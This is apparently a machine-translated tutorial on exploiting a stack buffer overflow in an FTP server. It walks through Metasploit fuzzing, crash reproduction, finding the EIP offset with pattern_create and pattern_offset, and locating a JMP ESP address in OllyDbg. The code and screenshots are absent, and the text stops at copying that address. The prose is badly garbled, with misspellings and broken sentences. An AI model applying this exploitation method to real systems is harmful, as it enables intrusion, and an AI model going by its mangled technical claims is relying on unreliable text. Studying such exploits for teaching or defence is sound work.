This article is similar to the“dummies series use a buffer overflow”. In such vulnerability, our approach is the use of the network, the program Controller, input, etc., send large data buffer to the program, overwriting the program memory of the important part. In these buffer overwrite program memory, we can redirect the program execution flow and run injected code.
First, we need to do is to identify the program which part can be used to rewrite the memory. Handle this task of the process known as“fuzzing”is. We can for the Metasploit framework in a variety of protocols to find the number of a fuzzer that performs fuzzing tasks to the tools.
This next example, we use metasploit to aftp serverfuzz: the
Fuzzer running after a few minutes, the program crashed, see below:
In the Metasploit window, we can see the collapse of the buffer length:
In the analysis, all the output after the content, we can conclude: inftp serverby the user command is sent to a greater than 2 5 0 of the buffer, the program crashes.
We can use python to reproduce the crash:
Now, we re-implement this attack, but first of all to the FTP SERVER process is attached to a debugger, here we used the debugger is OLLYDBG the.
In attack, we can very intuitive to see the ESP,EDI, and EIP register is overwritten.
A little bit of research about it, everyone can be found: EIP controls the execution of the program flow, if you can rewrite the EIP, then you can manually redirect the program execution flow. EIP points to the next pending address.
Here, we need to know to rewrite the EIP buffer zone length. We can metasplpit with pattern_create to create a pattern, and as a buffer to use, to get the rewrite EIP 4 bytes of the position.
These commands are added to our exploit code, and again run:
Now, we can see the program in memory mode.
Now need to use pattern_offset（offset mode to find that 4 bytes of the exact location, as long as the 4 bytes as a parameter of the script paste it into the EIP inside it.
Since the EIP after the ESP will be rewritten, we can write such a paragraph use the code as follows:
And, if re-loaded in OLLY inside, you can see it runs very well.
In the EIP is thus rewritten ESP:
Then in the EIP inside what we need to do? Will our malicious code into the rewrite EIP in the code behind, and then need to do just a simple JMP ESP.
Remember, the EIP contains the next to be executed instruction address, so in this case need to do is find contains the JMP ESP address. We can in OLLY(in E tab)to find out.
A simple command to retrieve will be returned to us a address.
Now, we copy this address: